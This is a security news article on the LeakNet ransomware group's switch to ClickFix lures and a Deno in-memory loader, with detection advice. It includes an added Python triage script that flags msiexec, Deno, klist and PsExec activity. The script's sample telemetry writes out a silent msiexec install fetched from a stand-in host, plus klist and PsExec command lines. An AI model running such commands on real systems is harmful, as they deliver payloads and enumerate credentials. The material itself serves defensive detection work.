PROBABLYPWNED
Malware | March 18, 2026 | 4 min read

LeakNet Ransomware Ditches IABs for ClickFix and Deno

LeakNet ransomware now uses ClickFix social engineering via hacked websites and a Deno-based in-memory loader to evade detection. Here's how the attack chain works.

James Rivera

The LeakNet ransomware operation has shifted tactics, abandoning traditional initial access brokers in favor of ClickFix social engineering delivered through compromised legitimate websites. The group now deploys a staged command-and-control loader built on the Deno JavaScript runtime, executing payloads directly in memory to minimize forensic evidence.

According to ReliaQuest research, LeakNet is "casting a wide net to infect as many victims as possible" rather than pursuing targeted intrusions.

From IABs to Self-Service Initial Access

LeakNet's pivot away from initial access brokers represents a strategic shift in ransomware economics. Rather than purchasing credentials from underground markets—introducing delays, costs, and dependencies—the group now generates its own entry points by embedding ClickFix lures into hacked websites.

The ClickFix technique tricks users into copying and pasting an msiexec.exe command into the Windows Run dialog. Visitors to compromised sites encounter fake CAPTCHA verification prompts or error messages that claim the user must run a command to proceed. It's crude, but it works.

We've covered ClickFix campaigns extensively, including the WordPress compromise operation affecting 250 sites that distributed Vidar and Vodka stealers. LeakNet's adoption signals that even ransomware operators see value in this technique over traditional access methods.

The Deno Loader

What sets LeakNet apart from other ClickFix-enabled threats is the post-compromise tooling. The group uses a staged loader built on Deno, the TypeScript and JavaScript runtime created by Node.js founder Ryan Dahl.

The system executes Base64-encoded JavaScript directly in memory. According to the technical analysis, the payload fingerprints the compromised system, contacts external servers to retrieve next-stage malware, and enters a polling loop for repeated code execution—all without writing files to disk.

This approach minimizes forensic artifacts. Traditional antivirus solutions rely heavily on file scanning, so in-memory execution represents an effective evasion technique. Detection requires behavioral monitoring and memory analysis rather than signature matching.

Post-Compromise Activity

After successful execution, LeakNet operators follow a predictable playbook:

  1. Credential harvesting - Running cmd.exe /c klist to identify active authentication credentials
  2. DLL side-loading to launch malicious components through legitimate executables
  3. Lateral movement via PsExec to spread across the network
  4. S3 bucket abuse for staging and exfiltration, exploiting normal cloud traffic patterns
  5. Data theft and encryption as the final payload

The use of S3 buckets for exfiltration is particularly notable. Organizations that allow outbound traffic to AWS by default—which is most of them—provide natural cover for data theft. Security teams should monitor for unusual S3 activity, especially from hosts that don't typically interact with cloud storage.

Detection Guidance

ReliaQuest identifies several indicators that suggest LeakNet activity:

  • Deno runtime execution outside development environments
  • Suspicious 'msiexec' execution initiated from browsers
  • Abnormal PsExec usage patterns
  • Unexpected outbound traffic to S3 endpoints
  • DLL sideloading in unusual directories

The challenge is distinguishing malicious Deno usage from legitimate development activity. Context matters—a developer workstation running Deno during business hours differs significantly from an accounting machine executing Deno at 2 AM after the user visited a questionable website.

For organizations using EDR solutions, create detection rules that flag Deno execution on non-developer machines. The Microsoft macOS infostealers report documented similar runtime abuse with Python, suggesting this evasion pattern will only grow more common.
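The indicator list and the EDR-rule advice above translate fairly directly into a host-level triage pass over process-creation telemetry. The following is an added example, not code from the article or the ReliaQuest report; the event fields, host names, developer allowlist, the explorer.exe-plus-HTTP heuristic for the Run-dialog path, and the sample events are all constructed.

```python
# Added example, not from the article or ReliaQuest: applies the LeakNet
# indicators to process-creation events. Hosts, fields and events are constructed.
from dataclasses import dataclass

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
DEVELOPER_HOSTS = {"dev-ws-01", "dev-ws-02"}  # constructed allowlist
PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}

@dataclass(frozen=True)
class ProcEvent:
    host: str     # workstation the process started on
    parent: str   # parent process image name
    image: str    # process image name
    cmdline: str  # full command line

def classify(ev: ProcEvent) -> list[str]:
    """Return the indicator names matched by one process event."""
    image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    hits = []
    # Deno runtime on a host that is not a known developer workstation.
    if image == "deno.exe" and ev.host.lower() not in DEVELOPER_HOSTS:
        hits.append("deno_on_non_developer_host")
    # msiexec started by a browser (the article's indicator), or from the Run
    # dialog (explorer.exe parent) fetching over HTTP: an added heuristic.
    if image == "msiexec.exe" and (
        parent in BROWSERS or (parent == "explorer.exe" and "http" in cmd)
    ):
        hits.append("msiexec_from_browser_or_run_dialog")
    if image == "cmd.exe" and "klist" in cmd:  # credential enumeration step
        hits.append("klist_via_cmd")
    if image in PSEXEC_IMAGES:  # PsExec client or service binary
        hits.append("psexec_execution")
    return hits

def triage(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Group matched indicators per host; a host with several stands out."""
    findings: dict[str, list[str]] = {}
    for ev in events:
        for hit in classify(ev):
            findings.setdefault(ev.host, []).append(hit)
    return findings

# Constructed sample telemetry: a developer host and an accounting host.
SAMPLE_EVENTS = [
    ProcEvent("dev-ws-01", "code.exe", "deno.exe", "deno run app.ts"),
    ProcEvent("acct-pc-07", "explorer.exe", "msiexec.exe", "msiexec /i http://example.invalid/u.msi /qn"),
    ProcEvent("acct-pc-07", "msiexec.exe", "deno.exe", "deno eval <omitted>"),
    ProcEvent("acct-pc-07", "deno.exe", "cmd.exe", "cmd.exe /c klist"),
    ProcEvent("acct-pc-07", "cmd.exe", "psexec.exe", r"psexec \\fs01 cmd"),
]
```

Running `triage(SAMPLE_EVENTS)` leaves the developer host clean and stacks four indicators on the accounting host, which is the chained pattern (msiexec, Deno, klist, PsExec) that distinguishes this activity from a lone developer running Deno.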

Why This Matters

LeakNet emerged publicly in November 2024, marketing itself as a "digital watchdog" focused on internet freedom—the typical ideological veneer ransomware groups use for public relations. The group currently averages about three victims per month, but the tactical shift to ClickFix suggests scaling ambitions.

The move from IAB-dependent access to self-generated initial access removes a significant bottleneck. Credential purchases introduce delays and costs; ClickFix campaigns can operate continuously at minimal expense once the infrastructure is deployed.

For defenders, this means ransomware operators increasingly control their entire attack chain. The traditional defensive assumption that you can disrupt ransomware by targeting IABs no longer holds for groups like LeakNet.

Security awareness training should explicitly cover ClickFix scenarios. Users need to understand that legitimate websites don't ask them to copy commands into the Run dialog—ever. Combined with technical controls that restrict msiexec execution from user context, organizations can significantly reduce their exposure to this attack vector.

If you want to understand ransomware defense fundamentals, our ransomware guide covers the basics of how these operations work and what organizations can do to protect themselves.
